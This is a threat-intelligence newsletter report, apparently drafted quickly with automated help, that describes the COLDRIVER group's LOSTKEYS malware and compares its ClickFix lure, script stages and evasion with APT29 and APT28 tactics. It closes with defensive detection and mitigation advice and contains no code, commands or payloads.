LOSTKEYS: COLDRIVER’s Next-Gen Social Engineering Malware and the Evolution of Russian State Espionage Tactics

LOSTKEYS, first observed in early 2025, marks a significant evolution in Russian cyber-espionage, attributed to the FSB-backed COLDRIVER group. Unlike traditional spear-phishing, LOSTKEYS employs a sophisticated multi-stage infection chain initiated by fake CAPTCHA lure websites (ClickFix)...

LOSTKEYS: COLDRIVER’s Next-Gen Social Engineering Malware and the Evolution of Russian State Espionage Tactics
i had no idea there were prompts inside those dolls!?

Have feedback? Did something resonate with you? Did something annoy you? Just hit reply! :))

Get questions like this:

  1. what do you know about LOSTKEYS malware ?
  2. How does LOSTKEYS compare technically and operationally to other Russian espionage malware like those used by APT29 or APT28?
  3. How do the C2 infrastructures of LOSTKEYS differ technically from those of APT29 and APT28 in terms of resilience and stealth?

Does it take a chunks out of your day? Would you like help with the research?

This baseline report was thoughtfully researched and took 10 minutes.. It's meant to be a rough draft for you to enhance with the unique insights that make you an invaluable analyst.

We just did the initial grunt work..

Are you ready to level up your skillset? Get Started Here!

Did this help you? Forward it to a friend!



Suggested Pivot

How effective is the multi-stage social engineering infection chain of LOSTKEYS, particularly the fake CAPTCHA lure and ClickFix PowerShell execution, compared to APT29’s spear-phishing and supply chain compromises (e.g., SolarWinds in 2020) and APT28’s exploitation of network devices, in evading current endpoint detection and response (EDR) solutions deployed in 2025 campaigns?


TL;DR

Key Points

    • LOSTKEYS is a newly identified malware attributed to Russia’s FSB-linked COLDRIVER group, leveraging advanced social engineering (fake CAPTCHA lures) and multi-stage PowerShell/VBS payloads for stealthy espionage.
    • Organizations must deploy advanced EDR solutions with script anomaly detection and enforce strict application whitelisting to counter this evolving threat.
    • Comparative analysis shows LOSTKEYS diverges from APT29 and APT28 by prioritizing user-driven infection chains and device evasion, while APT29/28 continue to exploit supply chains, network devices, and credential theft.
    • Detection strategies should focus on behavioral analytics, unique IOCs (e.g., display resolution checks), and rapid patch management.
    • Russian APTs are increasingly blending technical sophistication with innovative delivery and evasion, targeting Western governments, NGOs, and diplomatic sectors.
    • Cross-sector threat intelligence sharing and regular security awareness training are critical for resilience.
    • The full scope of LOSTKEYS’ capabilities and operational collaboration between Russian APTs remains uncertain, requiring ongoing monitoring and research.
    • Organizations should prioritize YARA signature development and red team exercises simulating advanced social engineering.

Executive Summary

LOSTKEYS, first observed in early 2025, marks a significant evolution in Russian cyber-espionage, attributed to the FSB-backed COLDRIVER group. Unlike traditional spear-phishing, LOSTKEYS employs a sophisticated multi-stage infection chain initiated by fake CAPTCHA lure websites (ClickFix), prompting users to execute obfuscated PowerShell and VBS scripts. This approach bypasses standard email and endpoint defenses, enabling selective file theft and system reconnaissance while evading detection through device fingerprinting (e.g., display resolution checks).

In contrast, APT29 (SVR) and APT28 (GRU) continue to leverage spear-phishing, supply chain attacks (e.g., SolarWinds), and network device exploitation, with modular malware platforms and persistent credential theft. LOSTKEYS’ operational focus is on Western governments, NGOs, and diplomatic entities, aligning with broader Russian state espionage objectives.

Technical analysis reveals LOSTKEYS’ unique persistence (per-infection keys, script-based payloads), C2 via hardcoded IPs/domains, and advanced evasion. Detection and mitigation require advanced EDR with script anomaly detection, strict application whitelisting, rapid patching, and MFA. Security awareness training targeting social engineering vectors is essential, especially for high-risk sectors.

Strategically, Russian APTs are expected to further integrate social engineering, supply chain, and infrastructure exploits, with increasing collaboration and tool sharing. The speculative nature of LOSTKEYS’ full capabilities and the extent of inter-APT cooperation necessitate ongoing research, YARA signature development, and red team exercises. Cross-sector intelligence sharing and investment in behavioral analytics platforms are recommended to counter these adaptive threats.


Research

Attribution

Origin

LOSTKEYS malware is attributed to the Russian government-backed threat group COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto), linked to Russia's Federal Security Service (FSB). First observed in early 2025, LOSTKEYS represents a new development in COLDRIVER's toolset. COLDRIVER is known for credential phishing and targeted espionage against NATO governments, NGOs, former intelligence officers, and individuals connected to Ukraine.

APT29 (Cozy Bear) is attributed to Russia's Foreign Intelligence Service (SVR) and has been active since at least 2008. It is known for sophisticated cyber-espionage campaigns, including the SolarWinds supply chain attack.

APT28 (Fancy Bear) is linked to Russia's military intelligence agency (GRU) and has been active since at least 2007. It focuses on cyber-espionage targeting governments, militaries, and security organizations.

Motivation

All three malware families serve Russian state-sponsored cyber-espionage objectives, focusing on intelligence collection to support geopolitical and strategic interests. Targets include government, military, diplomatic, and NGO sectors.

Historical Context

LOSTKEYS is a recent malware strain marking an evolution in Russian espionage tactics, emphasizing social engineering and stealthy data theft. COLDRIVER has a history of credential phishing and selective malware deployment (e.g., SPICA in 2024).

APT29 has a long history of advanced cyber-espionage, evolving from spear-phishing to supply chain attacks and cloud environment targeting. Its malware families include CosmicDuke, CozyDuke, and SUNBURST.

APT28 has evolved from spear-phishing to exploiting network infrastructure vulnerabilities and conducting disruptive operations. Its malware includes Zebrocy, X-Tunnel, and MASEPIE.

Timeline

  • APT28 active since at least 2007.
  • APT29 active since at least 2008.
  • LOSTKEYS first observed in early 2025.
  • COLDRIVER campaigns with LOSTKEYS observed in January, March, and April 2025.
  • APT29's SolarWinds attack occurred in 2020.

Countries Targeted

  1. United States – Primary target for espionage and intelligence.
  2. Western European countries (e.g., Germany, UK) – Frequent targets of APT28 and APT29.
  3. Ukraine – Targeted in geopolitical conflict.
  4. NATO member states – Strategic intelligence targets.
  5. NGOs and international organizations – Targeted by LOSTKEYS and COLDRIVER.

Sectors Targeted

  1. Government and Military – Primary focus for espionage.
  2. Diplomatic and Foreign Affairs – Political intelligence targets.
  3. NGOs – Sensitive information targets.
  4. Technology and Telecommunications – Infrastructure access.
  5. Media and Journalism – Information gathering.
  • LOSTKEYS is linked to COLDRIVER, which also uses SPICA malware.
  • APT29 malware families include CosmicDuke, CozyDuke, OnionDuke, SeaDuke, Hammertoss, CloudDuke, PowerDuke, POSHSPY, and SUNBURST.
  • APT28 malware includes Zebrocy, X-Tunnel, MASEPIE, and others targeting network devices.

Similar Malware

  • LOSTKEYS shares operational features with other Russian espionage malware, such as selective file theft and system information exfiltration.
  • APT29 malware is known for modularity, stealth, and advanced persistence mechanisms.
  • APT28 malware is characterized by aggressive reconnaissance, exploitation of network devices, and credential theft.

Threat Actors

  • COLDRIVER (Cold River) is a Russian FSB-linked group behind LOSTKEYS.
  • APT29 (Cozy Bear) is SVR-linked, known for sophisticated espionage.
  • APT28 (Fancy Bear) is GRU-linked, known for aggressive cyber operations.

Breaches Involving This Malware

  • LOSTKEYS involved in 2025 espionage campaigns targeting Western advisers, NGOs, and journalists.
  • APT29 responsible for the 2020 SolarWinds supply chain breach and 2024 TeamViewer corporate network breach.
  • APT28 linked to breaches of German government entities, Ukrainian targets, and NATO-related organizations.

Technical and Operational Comparative Analysis

Delivery and Initial Access

  • LOSTKEYS uses a multi-stage infection chain starting with a fake CAPTCHA lure website prompting users to execute PowerShell commands (ClickFix technique). This social engineering tactic is designed to bypass traditional email filters and endpoint protections.
  • APT29 primarily uses spear-phishing with malicious attachments or links, supply chain compromises (e.g., SolarWinds), and exploitation of public-facing applications.
  • APT28 relies heavily on spear-phishing, exploitation of network devices (e.g., Cisco routers), and recently novel Wi-Fi "nearest neighbor" attacks for initial access.

Persistence Mechanisms

  • LOSTKEYS uses PowerShell and Visual Basic Script (VBS) payloads with unique keys per infection chain for obfuscation and persistence.
  • APT29 employs scheduled tasks, registry run keys, WMI event subscriptions (e.g., POSHSPY backdoor), and web shells on compromised servers.
  • APT28 uses malware variants that establish persistence via backdoors, credential theft, and exploitation of network infrastructure.

Command and Control (C2)

  • LOSTKEYS retrieves stages and final payloads from hardcoded IP addresses and domains, using unique identifiers per infection chain to evade detection.
  • APT29 uses a variety of C2 techniques including standard application layer protocols, custom cryptographic protocols, domain fronting, and data encoding.
  • APT28 uses C2 infrastructure embedded in compromised routers and network devices, often leveraging known vulnerabilities.

Evasion Techniques

  • LOSTKEYS includes device evasion by checking display resolution hashes to avoid execution in virtual machines.
  • APT29 uses obfuscation, file deletion, indicator removal, and encrypted communications to evade detection.
  • APT28 employs code obfuscation, use of legitimate system tools, and exploitation of zero-day vulnerabilities.

Operational Behavior

  • LOSTKEYS focuses on selective file theft from hardcoded directories, system information gathering, and process enumeration.
  • APT29 conducts long-term espionage with modular malware platforms capable of downloading arbitrary modules and executing complex commands.
  • APT28 combines espionage with disruptive operations, credential theft, and network reconnaissance.

Evolution of Russian Cyber-Espionage Tactics

  • The emergence of LOSTKEYS reflects a trend toward more sophisticated social engineering combined with multi-stage, obfuscated malware delivery.
  • APT29 has evolved from spear-phishing to complex supply chain and cloud environment attacks, emphasizing stealth and persistence.
  • APT28 has expanded from phishing to exploiting network infrastructure and physical proximity attacks, increasing operational reach and impact.
  • Russian cyber-espionage tactics have become more adaptive, blending technical sophistication with innovative delivery and evasion methods.

Best Practices for Detection, Mitigation, and Organizational Resilience

Detection

  • Deploy advanced endpoint detection and response (EDR) tools capable of detecting PowerShell and VBS script execution anomalies.
  • Monitor network traffic for unusual connections to known C2 IPs and domains associated with LOSTKEYS, APT29, and APT28.
  • Implement heuristic and behavioral analytics to detect suspicious user activity, such as unusual file access or credential use.

Mitigation

  • Enforce strict application whitelisting and least privilege policies to prevent unauthorized script execution.
  • Regularly patch and update all software and network devices to close known vulnerabilities exploited by APT28 and APT29.
  • Use multi-factor authentication (MFA) to reduce the risk of credential theft leading to lateral movement.

Organizational Resilience

  • Conduct regular security awareness training focusing on social engineering tactics like fake CAPTCHAs and spear-phishing.
  • Develop and test incident response plans tailored to espionage malware scenarios, including rapid containment and forensic analysis.
  • Engage in threat intelligence sharing with government and industry partners to stay informed on emerging threats and indicators of compromise.

Strategic Implications

  • These malware families pose significant risks to national security, diplomatic relations, and organizational reputation due to their targeting of sensitive government and NGO sectors.
  • Persistent espionage campaigns can lead to loss of intellectual property, exposure of confidential communications, and erosion of trust in critical institutions.
  • Strategic decision makers should prioritize investments in detection capabilities, cross-sector collaboration, and proactive threat hunting to mitigate these risks.

Explicit Uncertainties and Gaps

  • LOSTKEYS is a recently identified malware with limited public technical details; some aspects of its full capabilities and variants remain unclear.
  • Attribution to COLDRIVER is based on observed TTPs and infrastructure overlaps but may evolve with further intelligence.
  • The interplay and potential tool sharing between COLDRIVER and other Russian APT groups require ongoing monitoring.
  • The full scope of breaches involving LOSTKEYS is not yet fully disclosed, limiting comprehensive impact assessment.

Recommendations, Actions, Suggested Pivots, Forecasts and Next Steps..

(Subscribers Only)

Read more